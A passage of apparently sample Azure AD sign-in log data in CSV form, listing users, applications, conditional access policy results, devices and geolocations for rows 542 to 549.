'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:10,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",3b8b7938-8760-4109-8029-77e7fb8a4d00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3b8b7938-8760-4109-8029-77e7fb8a4d00,SigninLogs,Sucess,32.32146072,34.85319901
+542,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:32.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8f391060-6901-46e8-9a04-8e8deb5a0bf9,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e950640f-89f2-49b5-9956-82780fe51c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e950640f-89f2-49b5-9956-82780fe51c00,SigninLogs,Sucess,50.6406517,5.572050095
+543,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:39.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3840a0be-50d7-4be9-9f22-c9946093028c,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e950640f-89f2-49b5-9956-82780de61c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,e950640f-89f2-49b5-9956-82780de61c00,SigninLogs,Sucess,50.6406517,5.572050095
+544,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:35.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,dce4bf8e-1f7c-4f53-a852-17e7962b9aa7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8900d912-3d17-47c8-917b-3b4370c21e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8900d912-3d17-47c8-917b-3b4370c21e00,SigninLogs,Sucess,36.6404686,-78.26995087
+545,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:08.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,17e96a23-8d7e-4db9-80ed-c50afcdcc12e,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ad09f59c-2ec1-4ebf-90ab-0f25d4131c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,ad09f59c-2ec1-4ebf-90ab-0f25d4131c00,SigninLogs,Sucess,50.6406517,5.572050095
+546,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:14.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1b0d7503-d1d5-422d-a8ce-5ca87e2f084e,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ad09f59c-2ec1-4ebf-90ab-0f259a141c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,ad09f59c-2ec1-4ebf-90ab-0f259a141c00,SigninLogs,Sucess,50.6406517,5.572050095
+547,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:31.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,095b8904-c467-4a92-b68c-54d9edfa65cf,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 19:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8a945db4-b61d-4e46-b881-75d8b7a52000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8a945db4-b61d-4e46-b881-75d8b7a52000,SigninLogs,Sucess,36.6404686,-78.26995087
+548,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:05.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f84a98f5-44e4-4b33-a05c-a680974e48b3,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179e388a1a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,62115b57-0cb2-458e-8ba0-179e388a1a00,SigninLogs,Sucess,33.7984581,-84.38828278
+549,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:27.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3fdb46c0-57ed-4553-bee7-8264df0fed0f,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, 